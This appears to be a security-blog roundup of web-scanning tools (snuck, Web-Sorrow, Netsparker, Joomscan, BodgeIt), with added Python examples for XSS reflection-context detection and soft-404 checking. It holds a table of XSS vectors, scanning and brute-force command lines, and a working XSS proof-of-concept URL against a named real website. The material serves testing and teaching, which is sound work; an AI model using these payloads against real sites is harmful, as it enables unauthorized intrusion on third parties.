snuck : Automatic XSS filter bypass Tool


snuck is an automated tool that helps find XSS vulnerabilities in web applications. It is based on Selenium and supports Mozilla Firefox, Google Chrome and Internet Explorer.

Its approach is based on inspecting the reflection context of each injection, and it relies on a set of specialized and obfuscated attack vectors for filter evasion.

In addition, XSS testing is performed in-browser: a real web browser is driven to reproduce the attacker's behavior and, where the attack needs it, the victim's.

Description
snuck is quite different from typical web security scanners: it tries to break a given XSS filter by specializing the injections in order to increase the success rate.

The attack vectors are selected on the basis of the reflection context, that is, the exact point in the reflection page's DOM where the injection lands. Access to the page's DOM is obtained through Selenium WebDriver, an automation framework that replicates user operations in web browsers. Since many steps may be involved before an XSS filter is "activated", an XML configuration file must be filled in to make snuck aware of the steps it needs to perform against the tested web application. Practically speaking, the approach is similar to iSTAR's, but it focuses on one particular XSS filter.
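The reflection-context step is the heart of the approach described above, so here is a worked version of it. This is an added example, not snuck's own code: it injects a unique lowercase canary, takes the HTML of the reflection page (with WebDriver this would be driver.page_source, assumed here as a constructed string), reports every place the canary lands together with its DOM context, and pairs each context with one generic vector family. The VECTORS table is illustrative only; snuck ships its own specialized and obfuscated set.

```python
"""Reflection-context classification for a reflected canary.

Added example, not snuck's code. The context decides which vector family can
work: an unquoted attribute value needs only whitespace to add an event
handler, a quoted one needs the matching quote, a text node needs '<', and a
script body needs neither.
"""
from html.parser import HTMLParser
import re

# One generic vector per context, illustrative only; snuck ships its own set.
VECTORS = {
    "text": "<svg onload=alert(1)>",
    "attr-unquoted": "x onmouseover=alert(1)",
    "attr-double-quoted": 'x" onmouseover="alert(1)',
    "attr-single-quoted": "x' onmouseover='alert(1)",
    "attr-name": "onmouseover=alert(1)",
    "script": "';alert(1)//",
    "comment": "--><svg onload=alert(1)>",
}


class ReflectionFinder(HTMLParser):
    """Collects (context, location) for every reflection of `canary`."""

    def __init__(self, canary):
        # convert_charrefs=False keeps '&lt;' as an entity reference, so an
        # HTML-encoded reflection is not mistaken for a raw '<' in a text node.
        super().__init__(convert_charrefs=False)
        self.canary = canary          # must be lowercase: html.parser lowercases names
        self.hits = []
        self._stack = []              # open elements, to report the enclosing tag
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        raw = self.get_starttag_text() or ""
        start = 0
        for name, value in attrs:
            idx = max(raw.find(self.canary, start), 0)
            if self.canary in name:
                # The canary became an attribute name: the injection already
                # broke out of a value into tag context.
                self.hits.append(("attr-name", tag))
            elif value is not None and self.canary in value:
                self.hits.append((self._attr_context(raw[:idx]), f"{tag}[{name}]"))
            else:
                continue
            start = idx + len(self.canary)
        if tag == "script":
            self._in_script = True
        self._stack.append(tag)

    @staticmethod
    def _attr_context(before):
        # attrs already has quotes stripped, so inspect the raw tag text that
        # precedes the canary to see how the value was delimited.
        m = re.search(r'=\s*(["\'])?[^"\'=]*$', before)
        quote = m.group(1) if m else None
        return {'"': "attr-double-quoted", "'": "attr-single-quoted"}.get(quote, "attr-unquoted")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
        while self._stack and self._stack.pop() != tag:
            pass                      # also drops void elements such as <input>

    def handle_data(self, data):
        if self.canary in data:
            self.hits.append(("script" if self._in_script else "text", self._enclosing()))

    def handle_comment(self, data):
        if self.canary in data:
            self.hits.append(("comment", self._enclosing()))

    def _enclosing(self):
        return self._stack[-1] if self._stack else "document"


def find_reflections(page_html, canary):
    """Return [(context, location), ...] in document order."""
    finder = ReflectionFinder(canary)
    finder.feed(page_html)
    finder.close()
    return finder.hits


def suggest_vectors(page_html, canary):
    """Pair each reflection with the vector family that fits its context."""
    return [(ctx, where, VECTORS[ctx]) for ctx, where in find_reflections(page_html, canary)]


# Constructed reflection page: the canary is echoed into five different contexts.
CANARY = "zq9canary"
SAMPLE_PAGE = f"""<html><head><script>var last = '{CANARY}';</script></head>
<body><!-- debug: q={CANARY} -->
<form action="/search"><input type="text" name="q" value={CANARY}>
<input type="hidden" name="prev" value="{CANARY}"></form>
<p>No results for {CANARY}</p></body></html>"""

if __name__ == "__main__":
    for ctx, where, vector in suggest_vectors(SAMPLE_PAGE, CANARY):
        print(f"{ctx:20} in {where:15} try: {vector}")
```

On the constructed page the same canary is reported once as script content, once inside a comment, once as an unquoted and once as a double-quoted attribute value, and once as a text node, and each hit gets a different starting vector. A real run would then submit those vectors through the browser, which is the part snuck's XML configuration drives.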

Download it from here:
http://code.google.com/p/snuck/downloads/list

Tutorial can be found here:
http://code.google.com/p/snuck/wiki/Tutorial

Web-Sorrow v1.3.6 : a remote web scanner

A Perl-based tool used for checking a web server for misconfiguration, version detection, enumeration and server information. I will build more functionality in the future. What it's NOT: a vulnerability scanner, inspection proxy, DDoS tool or exploitation framework. It's entirely focused on enumeration and collecting info on the target server.


CURRENT functionality:

-S - stands for standard. A set of standard tests that includes: directory indexing testing, banner grabbing, language detection (should be obvious), robots.txt, and 200 response testing (some servers send a 200 OK for every request)

-auth - looks for login pages with a list of some of the most common login files, dirs and admin consoles. It doesn't need to be a very big list of URLs, because what else are you going to name it? notAlogin.php???

-Cp - scan with a huge list of plugin dirs. The list is a bit old (2010)

-I - searches the responses for interesting strings

-Ws - looks for web services such as hosting provider, blogging services, favicon fingerprinting and CMS version info

-Fd - looks for things people generally don't want you to see. The list is generated from a TON of robots.txt files, so whatever it finds should be interesting.

-Fp - fingerprint the server based on behavior (unrefined as of yet)

-ninja - a lightweight and undetectable scan that uses bits and pieces from other scans

-Sd - brute-force subdomains

-Db - brute-force directories with the big DirBuster database

-ua - use a custom User-Agent. PUT THE UA IN QUOTES if there are spaces

-proxy - send all HTTP requests via a proxy. Example: 255.255.255.254:8080

-e - run all the scans in the tool

web-sorrow also has false-positive checking on most of its requests (it's pretty accurate but not perfect)
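The "200 response testing" in -S and the false-positive checking are the same problem: a server that answers 200 OK for every request turns a directory brute-force into a list of every word in the wordlist. The following is an added example of how such a baseline check works, not web-sorrow's code: fetch is an assumed callable (path) -> (status, body), and the two fake servers below are constructed stand-ins for real HTTP requests so the logic runs offline.

```python
"""Catch-all 200 baseline check before directory brute-forcing.

Added example, not web-sorrow's code. Nonexistent random paths are requested
first; if the server still answers 200, their bodies become the "soft 404"
baseline, and later 200 responses are only reported when they differ from it.
"""
import difflib
import secrets


def random_path():
    # A path no site will have; the server's answer to it is the "not found" baseline.
    return "/" + secrets.token_hex(6)


def soft404_baseline(fetch, probes=3):
    """Return None when the server answers nonexistent paths with a non-200
    status (status codes can be trusted), else the bodies it served, with the
    echoed path stripped so that two soft-404 pages compare as equal."""
    bodies = []
    for _ in range(probes):
        path = random_path()
        status, body = fetch(path)
        if status != 200:
            return None
        bodies.append(body.replace(path, ""))
    return bodies


def looks_like_soft404(body, path, baseline, threshold=0.9):
    """A 200 page is a disguised 404 if it is near-identical to the baseline."""
    stripped = body.replace(path, "")
    return any(difflib.SequenceMatcher(None, stripped, ref).ratio() >= threshold
               for ref in baseline)


def naive_hits(fetch, wordlist):
    """What a scanner without baseline checking would report."""
    return [path for path in wordlist if fetch(path)[0] == 200]


def confirmed_hits(fetch, wordlist):
    """Brute-force `wordlist`, keeping only 200s that are not the catch-all page."""
    baseline = soft404_baseline(fetch)
    hits = []
    for path in wordlist:
        status, body = fetch(path)
        if status != 200:
            continue
        if baseline is not None and looks_like_soft404(body, path, baseline):
            continue
        hits.append(path)
    return hits


# Constructed fake servers standing in for HTTP requests.
REAL_PAGES = {
    "/admin/": "<html><body><h1>Admin console</h1><form><input name=user><input name=pass></form></body></html>",
    "/robots.txt": "User-agent: *\nDisallow: /backup/\n",
}
WORDLIST = ["/admin/", "/robots.txt", "/backup/", "/phpmyadmin/", "/login.php"]


def catch_all_fetch(path):
    """Answers 200 OK for everything, echoing the requested path in a friendly page."""
    if path in REAL_PAGES:
        return 200, REAL_PAGES[path]
    return 200, (f"<html><body><h1>Oops</h1><p>We could not find {path}, "
                 "so here is our homepage instead.</p></body></html>")


def strict_fetch(path):
    """A well-behaved server: unknown paths get a real 404."""
    if path in REAL_PAGES:
        return 200, REAL_PAGES[path]
    return 404, "<h1>Not Found</h1>"


if __name__ == "__main__":
    print("catch-all server, naive:    ", naive_hits(catch_all_fetch, WORDLIST))
    print("catch-all server, confirmed:", confirmed_hits(catch_all_fetch, WORDLIST))
    print("strict server, confirmed:   ", confirmed_hits(strict_fetch, WORDLIST))
```

Against the catch-all server the naive scan reports all five paths while the baseline check keeps only the two that really exist; against the strict server the baseline is skipped because the status codes already tell the truth. The similarity threshold is the knob: pages that embed the requested path, a timestamp or a CSRF token need the stripping step or a lower threshold, which is why the tool's own checking is "pretty accurate but not perfect".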

EXAMPLES:

basic: perl Wsorrow.pl -host scanme.nmap.org -S

look for login pages: perl Wsorrow.pl -host 192.168.1.1 -auth

CMS intense scan: perl Wsorrow.pl -host 192.168.1.1 -Ws -Cp all -I

most intense scan possible: perl Wsorrow.pl -host 192.168.1.1 -e -ua "I come in peace"

Download it from here:
http://code.google.com/p/web-sorrow/downloads/list

Web application security scanner Netsparker v2.1 released

Netsparker® can find and report security issues such as SQL Injection and Cross-site Scripting (XSS) in all web applications regardless of the platform and the technology they are built on.

Netsparker's unique detection and exploitation techniques allow it to be dead accurate in its reporting; hence its vendor calls it the first and only false-positive-free web application security scanner.

Download from here:
http://www.mavitunasecurity.com/blog/announcing-netsparker-21/

Joomscan Update detects 611 vulnerabilities in Joomla


Security Web Center released an updated version of the Joomscan security scanner. The updated version detects 611 vulnerabilities in the Joomla CMS; the previous version, released in November, could detect 550.

In joomscan you can check for new updates with the command ./joomscan.pl check or ./joomscan.pl update.

Joomla! is probably the most widely used CMS out there, thanks to its flexibility, user friendliness and extensibility, to name a few. So watching its vulnerabilities and adding them to the Joomla scanner's knowledge base is an ongoing activity. It helps web developers and webmasters identify possible security weaknesses in their deployed Joomla! sites.

Download for Windows (141 KB)
Download for Linux (150 KB)

XSS vulnerability found in RankMyHack.com

A hacker named "lolstorm" found an XSS vulnerability in RankMyHack.com: the contact form of the website is vulnerable to cross-site scripting (XSS). RankMyHack is a site that ranks hackers based on their hacks.

Vulnerable Link:
www.rankmyhack.com/contact.php

POC:
www.rankmyhack.com/contact.php?subject=XSS onmouseover=alert(this.value);

This displays an alert box containing "XSS". The payload contains no quote character, which indicates that the subject parameter is reflected into an unquoted attribute value (value=XSS onmouseover=...): the first space ends the value at "XSS" and the rest becomes an onmouseover attribute on the same tag, so this.value is "XSS" when the handler fires.
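To make the attribute-context mechanics behind this PoC concrete, here is an added example that is not RankMyHack's code: three constructed templates (unquoted, quoted but unescaped, and quoted plus entity-encoded) rendered with the reported payload and with a quote-breaking variant, then parsed with the standard library's HTML parser to list the attributes a browser would actually see on the tag.

```python
"""Attribute-context XSS: unquoted value, quoted-but-unescaped value, and the fix.

Added example, not RankMyHack's code. The templates are constructed to show
why a payload with no quote character works against an unquoted attribute,
why quoting alone is not enough, and what correct output encoding looks like.
"""
import html
from html.parser import HTMLParser

# The payload from the report, as it arrives in the `subject` parameter.
REPORTED_PAYLOAD = "XSS onmouseover=alert(this.value);"
# A variant that breaks out of a double-quoted attribute instead.
QUOTED_PAYLOAD = 'XSS" onmouseover="alert(this.value);'


def render_unquoted(subject):
    # Unquoted attribute value: the first whitespace ends the value and
    # everything after it is parsed as further attributes of the same tag.
    return f'<input type="text" name="subject" value={subject}>'


def render_quoted_unescaped(subject):
    # Quoted but not escaped: a '"' in the input closes the value early.
    return f'<input type="text" name="subject" value="{subject}">'


def render_safe(subject):
    # Quote the attribute AND entity-encode &, <, >, " and ' in the value.
    return f'<input type="text" name="subject" value="{html.escape(subject, quote=True)}">'


class _AttrLister(HTMLParser):
    """Records the attributes of the first tag, as a parser (and a browser) sees them."""

    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if not self.attrs:
            self.attrs = dict(attrs)


def attributes_seen(markup):
    p = _AttrLister()
    p.feed(markup)
    p.close()
    return p.attrs


def injected_handlers(markup):
    """Names of any on* event-handler attributes that reached the tag."""
    return sorted(a for a in attributes_seen(markup) if a.startswith("on"))


if __name__ == "__main__":
    cases = [
        ("unquoted, reported payload", render_unquoted(REPORTED_PAYLOAD)),
        ("quoted, reported payload", render_quoted_unescaped(REPORTED_PAYLOAD)),
        ("quoted, quote-breaking payload", render_quoted_unescaped(QUOTED_PAYLOAD)),
        ("quoted + escaped", render_safe(QUOTED_PAYLOAD)),
    ]
    for label, page in cases:
        seen = attributes_seen(page)
        print(f"{label:32} value={seen['value']!r} handlers={injected_handlers(page)}")
```

In the unquoted case the parser sees value="XSS" plus a separate onmouseover attribute, which is exactly why the alert shows "XSS". The same payload does nothing against a quoted attribute, but a payload carrying a double quote does, so quoting is only half the fix; with html.escape(..., quote=True) the whole input survives as the value and no handler attribute is created.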

The BodgeIt Store v1.2.0 ~ a deliberately vulnerable web application

The BodgeIt Store is a vulnerable web application which is currently aimed at people who are new to pen testing.
Some of its features and characteristics:
  • Easy to install - just requires java and a servlet engine, e.g. Tomcat
  • Self contained (no additional dependencies other than the two in the line above)
  • Easy to change on the fly - all the functionality is implemented in JSPs, so no IDE required
  • Cross platform
  • Open source
  • No separate db to install and configure - it uses an 'in memory' db that is automatically (re)initialized on start up 
All you need to do is download and open the zip file, and then extract the war file into the webapps directory of your favorite servlet engine.
Then point your browser at (for example) http://localhost:8080/bodgeit
You may find it easier to find vulnerabilities using a pen test tool.

The BodgeIt Store includes the following significant vulnerabilities:
  • Cross Site Scripting
  • SQL injection
  • Hidden (but unprotected) content
  • Cross Site Request Forgery
  • Debug code
  • Insecure Object References
  • Application logic vulnerabilities


These are the changes made to BodgeIt v1.2.0:

A page has been added for changing your password, and there have been a few miscellaneous tweaks. But the most significant changes have been enablers for the security regression tests.